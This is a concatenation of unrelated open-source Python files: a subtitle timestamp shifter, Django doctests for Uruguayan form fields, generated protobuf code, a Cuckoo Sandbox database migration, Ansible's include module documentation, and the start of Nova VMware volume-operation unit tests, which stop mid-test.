return '0'+t[:7]+':'+milli
def shift(line,seconds):
triplet = tripletize(line)
base = text2delta(triplet[1])
base = base + datetime.timedelta(seconds=seconds)
base = delta2text(base)
return triplet[0]+base+triplet[2]
INFILE =sys.argv[1]
OUTFILE =sys.argv[2]
DIFF =float(sys.argv[3])
o = open(OUTFILE,'wt')
for line in open(INFILE):
if line.startswith('timestamp'):
line = shift(line,DIFF)
o.write(line)
o.close()
| gpl-2.0 |
aprefontaine/TMScheduler | tests/regressiontests/forms/localflavor/uy.py | 14 | 2014 | # -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ UY form fields.
tests = r"""
# UYDepartamentSelect #########################################################
>>> from django.contrib.localflavor.uy.forms import UYDepartamentSelect
>>> f = UYDepartamentSelect()
>>> f.render('departamentos', 'S')
u'<select name="departamentos">\n<option value="G">Artigas</option>\n<option value="A">Canelones</option>\n<option value="E">Cerro Largo</option>\n<option value="L">Colonia</option>\n<option value="Q">Durazno</option>\n<option value="N">Flores</option>\n<option value="O">Florida</option>\n<option value="P">Lavalleja</option>\n<option value="B">Maldonado</option>\n<option value="S" selected="selected">Montevideo</option>\n<option value="I">Paysand\xfa</option>\n<option value="J">R\xedo Negro</option>\n<option value="F">Rivera</option>\n<option value="C">Rocha</option>\n<option value="H">Salto</option>\n<option value="M">San Jos\xe9</option>\n<option value="K">Soriano</option>\n<option value="R">Tacuaremb\xf3</option>\n<option value="D">Treinta y Tres</option>\n</select>'
# UYCIField ###################################################################
>>> from django.contrib.localflavor.uy.util import get_validation_digit
>>> get_validation_digit(409805) == 3
True
>>> get_validation_digit(1005411) == 2
True
>>> from django.contrib.localflavor.uy.forms import UYCIField
>>> f = UYCIField()
>>> f.clean('4098053')
u'4098053'
>>> f.clean('409805-3')
u'409805-3'
>>> f.clean('409.805-3')
u'409.805-3'
>>> f.clean('10054112')
u'10054112'
>>> f.clean('1005411-2')
u'1005411-2'
>>> f.clean('1.005.411-2')
u'1.005.411-2'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number in X.XXX.XXX-X,XXXXXXX-X or XXXXXXXX format.']
>>> f.clean('409805-2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
>>> f.clean('1.005.411-5')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
"""
| bsd-3-clause |
earshel/PokeyPyManager | POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage_pb2.py | 16 | 4749 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Enums import Platform_pb2 as POGOProtos_dot_Enums_dot_Platform__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nPPOGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\x1a\x1fPOGOProtos/Enums/Platform.proto\"\xaa\x01\n\"DownloadRemoteConfigVersionMessage\x12,\n\x08platform\x18\x01 \x01(\x0e\x32\x1a.POGOProtos.Enums.Platform\x12\x1b\n\x13\x64\x65vice_manufacturer\x18\x02 \x01(\t\x12\x14\n\x0c\x64\x65vice_model\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12\x13\n\x0b\x61pp_version\x18\x05 \x01(\rb\x06proto3')
,
dependencies=[POGOProtos_dot_Enums_dot_Platform__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE = _descriptor.Descriptor(
name='DownloadRemoteConfigVersionMessage',
full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.platform', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_manufacturer', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_manufacturer', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_model', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_model', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='locale', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.locale', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='app_version', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.app_version', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=159,
serialized_end=329,
)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE.fields_by_name['platform'].enum_type = POGOProtos_dot_Enums_dot_Platform__pb2._PLATFORM
DESCRIPTOR.message_types_by_name['DownloadRemoteConfigVersionMessage'] = _DOWNLOADREMOTECONFIGVERSIONMESSAGE
DownloadRemoteConfigVersionMessage = _reflection.GeneratedProtocolMessageType('DownloadRemoteConfigVersionMessage', (_message.Message,), dict(
DESCRIPTOR = _DOWNLOADREMOTECONFIGVERSIONMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage)
))
_sym_db.RegisterMessage(DownloadRemoteConfigVersionMessage)
# @@protoc_insertion_point(module_scope)
| mit |
chubbymaggie/CuckooSploit | utils/db_migration/versions/from_0_6_to_1_1.py | 6 | 14422 | # Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Database migration from Cuckoo 0.6 to Cuckoo 1.1.
Revision ID: 263a45963c72
Revises: None
Create Date: 2014-03-23 23:30:36.756792
"""
# Revision identifiers, used by Alembic.
revision = "263a45963c72"
mongo_revision = "1"
down_revision = None
import os
import sys
import sqlalchemy as sa
from datetime import datetime
try:
from dateutil.parser import parse
except ImportError:
print "Unable to import dateutil.parser",
print "(install with `pip install python-dateutil`)"
sys.exit()
try:
from alembic import op
except ImportError:
print "Unable to import alembic (install with `pip install alembic`)"
sys.exit()
try:
from pymongo.connection import Connection
from pymongo.errors import ConnectionFailure
except ImportError:
print "Unable to import pymongo (install with `pip install pymongo`)"
sys.exit()
sys.path.append(os.path.join("..", ".."))
import lib.cuckoo.core.database as db
from lib.cuckoo.common.config import Config
def upgrade():
    # BEWARE: be prepared for really spaghetti code. To deal with SQLite limitations in Alembic we coded some workarounds.
    # Migrations are supported starting from Cuckoo 0.6 and Cuckoo 1.0; I need a way to figure out from which release
    # it will start because both schemas are missing alembic release versioning.
# I check for tags table to distinguish between Cuckoo 0.6 and 1.0.
conn = op.get_bind()
if conn.engine.dialect.has_table(conn.engine.connect(), "machines_tags"):
        # If this table exists we are on Cuckoo 1.0 or above.
# So skip SQL migration.
pass
else:
# We are on Cuckoo < 1.0, hopefully 0.6.
# So run SQL migration.
# Create table used by Tag.
op.create_table(
"tags",
sa.Column("id", sa.Integer(), primary_key=True),
sa.Column("name", sa.String(length=255), nullable=False, unique=True),
)
# Create secondary table used in association Machine - Tag.
op.create_table(
"machines_tags",
sa.Column("machine_id", sa.Integer, sa.ForeignKey("machines.id")),
sa.Column("tag_id", sa.Integer, sa.ForeignKey("tags.id")),
)
# Add columns to Machine.
op.add_column("machines", sa.Column("interface", sa.String(length=255), nullable=True))
op.add_column("machines", sa.Column("snapshot", sa.String(length=255), nullable=True))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_ip", sa.String(length=255), server_default="192.168.56.1", nullable=False))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_port", sa.String(length=255), server_default="2042", nullable=False))
# Deal with Alembic shit.
# Alembic is so ORMish that it was impossible to write code which works on different DBMS.
if conn.engine.driver == "psycopg2":
        # We don't provide a default value and leave the column as nullable because of further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True)
# Altering status ENUM.
# This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type.
op.execute('COMMIT') # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
conn.execute("ALTER TYPE status_type ADD VALUE 'completed'")
conn.execute("ALTER TYPE status_type ADD VALUE 'reported'")
conn.execute("ALTER TYPE status_type ADD VALUE 'recovered'")
conn.execute("ALTER TYPE status_type ADD VALUE 'running'")
conn.execute("ALTER TYPE status_type RENAME ATTRIBUTE success TO completed")
conn.execute("ALTER TYPE status_type DROP ATTRIBUTE IF EXISTS failure")
elif conn.engine.driver == "mysqldb":
        # We don't provide a default value and leave the column as nullable because of further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True, existing_type=sa.DateTime(timezone=False))
        # NOTE: To work around limitations in Alembic and the MySQL ALTER statement (cannot remove an item from an ENUM).
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
elif conn.engine.driver == "pysqlite":
# Edit task status enumeration in Task.
        # NOTE: To work around limitations in SQLite we have to create a temporary table, create the new schema and copy data.
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
# Migrate mongo.
mongo_upgrade()
def mongo_upgrade():
"""Migrate mongodb schema and data."""
# Read reporting.conf to fetch mongo configuration.
config = Config(cfg=os.path.join("..", "..", "conf", "reporting.conf"))
# Run migration only if mongo is enabled as reporting module.
if config.mongodb.enabled:
host = config.mongodb.get("host", "127.0.0.1")
port = config.mongodb.get("port", 27017)
print "Mongo reporting is enabled, strarting mongo data migration."
# Connect.
try:
conn = Connection(host, port)
db = conn.cuckoo
except TypeError:
print "Mongo connection port must be integer"
sys.exit()
except ConnectionFailure:
print "Cannot connect to MongoDB"
sys.exit()
# Check for schema version and create it.
if "cuckoo_schema" in db.collection_names():
print "Mongo schema version not expected"
sys.exit()
else:
db.cuckoo_schema.save({"version": mongo_revision})
else:
print "Mongo reporting module not enabled, skipping mongo migration."
def downgrade():
# We don"t support downgrade.
pass
| gpl-3.0 |
brokenjacobs/ansible | lib/ansible/modules/utilities/logic/include.py | 50 | 2305 | #!/usr/bin/python
# -*- mode: python -*-
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
author:
- "Ansible Core Team (@ansible)"
module: include
short_description: include a play or task list.
description:
- Includes a file with a list of plays or tasks to be executed in the current playbook.
- Files with a list of plays can only be included at the top level; lists of tasks can only be included where tasks normally run (in a play).
- Before 2.0 all includes were 'static', executed at play compile time.
- Static includes are not subject to most directives; loops or conditionals, for example, are applied instead to each inherited task.
- Since 2.0 task includes are dynamic and behave more like real tasks. This means they can be looped, skipped and use variables from any source.
Ansible tries to auto-detect this; use the `static` directive (new in 2.1) to bypass autodetection.
version_added: "0.6"
options:
free-form:
description:
- This module allows you to specify the name of the file directly without any other options.
notes:
- This is really not a module; even though it appears as one, it is a feature of the Ansible Engine, and as such it cannot be overridden the same way a
module can.
'''
EXAMPLES = """
# include a play after another play
- hosts: localhost
tasks:
- debug:
msg: "play1"
- include: otherplays.yml
# include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: stuff.yml
- debug:
msg: task10
# dynamic include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: "{{ hostvar }}.yml"
static: no
when: hostvar is defined
"""
RETURN = """
# this module does not return anything except plays or tasks to execute
"""
| gpl-3.0 |
gooddata/openstack-nova | nova/tests/unit/virt/vmwareapi/test_volumeops.py | 2 | 33206 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel
from oslo_vmware import exceptions as oslo_vmw_exceptions
from oslo_vmware import vim_util as vutil
from nova.compute import power_state
from nova.compute import vm_states
from nova import context
from nova import exception
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake as image_fake
from nova.tests.unit.virt.vmwareapi import fake as vmwareapi_fake
from nova.tests.unit.virt.vmwareapi import stubs
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import volumeops
class VMwareVolumeOpsTestCase(test.NoDBTestCase):
def setUp(self):
super(VMwareVolumeOpsTestCase, self).setUp()
vmwareapi_fake.reset()
stubs.set_stubs(self)
self._session = driver.VMwareAPISession()
self._context = context.RequestContext('fake_user', 'fake_project')
self._volumeops = volumeops.VMwareVolumeOps(self._session)
self._image_id = image_fake.get_valid_image_id()
self._instance_values = {
'name': 'fake_name',
'uuid': uuidsentinel.foo,
'vcpus': 1,
'memory_mb': 512,
'image_ref': self._image_id,
'root_gb': 10,
'node': 'respool-1001(MyResPoolName)',
'expected_attrs': ['system_metadata'],
}
self._instance = fake_instance.fake_instance_obj(self._context,
**self._instance_values)
def _test_detach_disk_from_vm(self, destroy_disk=False):
def fake_call_method(module, method, *args, **kwargs):
vmdk_detach_config_spec = kwargs.get('spec')
virtual_device_config = vmdk_detach_config_spec.deviceChange[0]
self.assertEqual('remove', virtual_device_config.operation)
self.assertEqual('ns0:VirtualDeviceConfigSpec',
virtual_device_config.obj_name)
if destroy_disk:
self.assertEqual('destroy',
virtual_device_config.fileOperation)
else:
self.assertFalse(hasattr(virtual_device_config,
'fileOperation'))
return 'fake_configure_task'
with test.nested(
mock.patch.object(self._session, '_wait_for_task'),
mock.patch.object(self._session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
fake_device = vmwareapi_fake.DataObject()
fake_device.backing = vmwareapi_fake.DataObject()
fake_device.backing.fileName = 'fake_path'
fake_device.key = 'fake_key'
self._volumeops.detach_disk_from_vm('fake_vm_ref', self._instance,
fake_device, destroy_disk)
_wait_for_task.assert_has_calls([
mock.call('fake_configure_task')])
def test_detach_with_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=True)
def test_detach_without_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=False)
def _fake_call_get_object_property(self, uuid, result):
def fake_call_method(vim, method, vm_ref, prop):
expected_prop = 'config.extraConfig["volume-%s"]' % uuid
self.assertEqual('VirtualMachine', vm_ref._type)
self.assertEqual(expected_prop, prop)
return result
return fake_call_method
def test_get_volume_uuid(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
opt_val = vmwareapi_fake.OptionValue('volume-%s' % uuid, 'volume-val')
fake_call = self._fake_call_get_object_property(uuid, opt_val)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertEqual('volume-val', val)
def test_get_volume_uuid_not_found(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
fake_call = self._fake_call_get_object_property(uuid, None)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertIsNone(val)
def test_attach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref'),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_info,
get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._attach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_extra_config_spec',
return_value=mock.sentinel.extra_config)
@mock.patch.object(vm_util, 'reconfigure_vm')
def test_update_volume_details(self, reconfigure_vm,
get_vm_extra_config_spec):
volume_uuid = '26f5948e-52a3-4ee6-8d48-0a379afd0828'
device_uuid = '0d86246a-2adb-470d-a9f7-bce09930c5d'
self._volumeops._update_volume_details(
mock.sentinel.vm_ref, volume_uuid, device_uuid)
get_vm_extra_config_spec.assert_called_once_with(
self._volumeops._session.vim.client.factory,
{'volume-%s' % volume_uuid: device_uuid})
reconfigure_vm.assert_called_once_with(self._volumeops._session,
mock.sentinel.vm_ref,
mock.sentinel.extra_config)
def _fake_connection_info(self):
return {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device(self, get_vmdk_backed_disk_device,
get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
device = mock.sentinel.device
get_vmdk_backed_disk_device.return_value = device
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
ret = self._volumeops._get_vmdk_backed_disk_device(
vm_ref, connection_info['data'])
self.assertEqual(device, ret)
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device_with_missing_disk_device(
self, get_vmdk_backed_disk_device, get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
get_vmdk_backed_disk_device.return_value = None
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
self.assertRaises(exception.DiskNotFound,
self._volumeops._get_vmdk_backed_disk_device,
vm_ref, connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
def test_detach_volume_vmdk(self):
vmdk_info = vm_util.VmdkInfo('fake-path', 'lsiLogic', 'thin',
1024, 'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref',
return_value=mock.sentinel.volume_ref),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device',
return_value=mock.sentinel.device),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, '_consolidate_vmdk_volume'),
mock.patch.object(self._volumeops, 'detach_disk_from_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, consolidate_vmdk_volume, detach_disk_from_vm,
update_volume_details):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id':
'd11a82de-ddaa-448d-b50a-a255a7e61a1e'
}}
instance = mock.MagicMock(name='fake-name',
vm_state=vm_states.ACTIVE)
self._volumeops._detach_volume_vmdk(connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
get_vmdk_info.assert_called_once_with(self._volumeops._session,
mock.sentinel.volume_ref)
consolidate_vmdk_volume.assert_called_once_with(
instance, mock.sentinel.vm_ref, mock.sentinel.device,
mock.sentinel.volume_ref, adapter_type=vmdk_info.adapter_type,
disk_type=vmdk_info.disk_type)
detach_disk_from_vm.assert_called_once_with(mock.sentinel.vm_ref,
instance,
mock.sentinel.device)
update_volume_details.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data']['volume_id'], "")
def test_detach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._detach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi(self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
